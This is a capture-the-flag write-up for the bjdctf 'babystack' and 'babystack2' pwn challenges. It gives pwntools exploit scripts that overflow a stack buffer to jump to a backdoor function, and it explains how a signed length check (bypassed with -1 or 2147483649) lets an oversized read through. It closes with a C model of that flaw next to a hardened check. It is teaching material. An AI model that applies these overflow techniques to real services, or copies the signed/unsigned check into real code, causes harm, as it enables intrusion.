bjdctf-2022-babystack-babystack-2 Writeups

Babystack

checksec:

# zhailin @ DESKTOP-4OQQP8F in ~/Pwns/ROP/bjdctf_2020_babystack [21:38:28] 
$ checksec bjdctf_2020_babystack
[*] '/home/zhailin/Pwns/ROP/bjdctf_2020_babystack/bjdctf_2020_babystack'
    Arch:       amd64-64-little
    RELRO:      Partial RELRO
    Stack:      No canary found
    NX:         NX enabled
    PIE:        No PIE (0x400000)
    Stripped:   No

exp:

from pwn import *

r = remote('node5.buuoj.cn', 29701)

r.sendline(b'50')  # any number well beyond the size of buf
payload = b'a' * 24 + p64(0x4006E6)  # 0x4006E6 is the backdoor function found in IDA
r.sendline(payload)
r.interactive()

Babystack2

exp1:

from pwn import *
# from LibcSearcher import *

context(os="linux", arch="amd64", log_level="debug")
p = remote('node5.buuoj.cn', 27319)

backdoor = 0x400726
# 2147483649 = 0x80000001: negative as a signed int, so it passes the length check
p.sendlineafter(b"length of your name:", b"2147483649")
payload = b'a' * 0x18 + p64(backdoor)
p.sendlineafter(b"name?", payload)
p.sendline(b"cat flag")

p.interactive()

exp2:

from pwn import *

io = remote('node5.buuoj.cn', 27319)

backdoor = 0x0400726
payload = b'a' * 0x18 + p64(backdoor)

io.sendlineafter(b'name:', b'-1')  # -1 passes the signed check, becomes a huge unsigned read count
io.sendlineafter(b'name?', payload)
io.interactive()

A short explanation: analysing the binary in IDA shows that this challenge hinges on an unsigned integer. Here is the relevant fragment of the decompiled code:

if ( (int)nbytes > 10 )
{
  puts("Oops,u name is too long!");
  exit(-1);
}
puts("[+]What's u name?");
read(0, buf, (unsigned int)nbytes);
return 0;

Look at the nbytes > 10 check: for read to overflow the buffer, nbytes would have to be larger than 0x10, but the check rules that out. There is an integer overflow here, though. If we enter -1, the if condition is bypassed, because the comparison is done on (int)nbytes. At the same time, the count passed to read is (unsigned int)nbytes, and an unsigned int has no sign, so -1 turns into the maximum unsigned int value. That is what lets the stack overflow happen.
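To make the mismatch concrete, here is an added example (not code from the writeup or the challenge binary) that models the decompiled check next to a hardened version. It assumes the length is read as a 32-bit integer, that buf is 0x10 bytes as the writeup states, and that the limit is 10 as in the decompiled fragment.

```c
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>

#define BUF_SIZE 0x10u  /* assumed size of buf, matching the writeup */
#define MAX_NAME 10     /* the limit in the decompiled check */

/* Model of the length being parsed into a 32-bit nbytes (assumption:
 * mimics a %d-style read that truncates to 32 bits, e.g. "-1" -> 0xFFFFFFFF). */
uint32_t parse_len(const char *s) {
    long long v = strtoll(s, NULL, 10);
    return (uint32_t)(uint64_t)v;
}

/* Mirrors the decompiled code: signed comparison, unsigned use.
 * Returns the count read() would receive, or 0 if the check rejects it. */
uint32_t vulnerable_read_len(uint32_t nbytes) {
    if ((int)nbytes > MAX_NAME)
        return 0;                   /* "Oops,u name is too long!" path */
    return (unsigned int)nbytes;    /* what read() actually gets */
}

/* Hardened: compare as unsigned, so "negative" inputs are seen for what
 * they are (huge counts) and rejected before reaching read(). */
uint32_t hardened_read_len(uint32_t nbytes) {
    if (nbytes > MAX_NAME)
        return 0;
    return nbytes;
}

/* Would a read of this many bytes run past buf? */
bool overflows(uint32_t count) {
    return count > BUF_SIZE;
}

int main(void) {
    const char *inputs[] = {"8", "50", "-1", "2147483649"};  /* constructed */
    for (size_t i = 0; i < 4; i++) {
        uint32_t n = parse_len(inputs[i]);
        printf("input %-11s vulnerable=0x%08x (%s)  hardened=%u\n", inputs[i],
               vulnerable_read_len(n),
               overflows(vulnerable_read_len(n)) ? "OVERFLOW" : "ok",
               hardened_read_len(n));
    }
    return 0;
}
```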


https://zer0ptr.github.io/2025/11/22/bjdctf-2022-babystack/
Author: zer0ptr
Published: 22 November 2025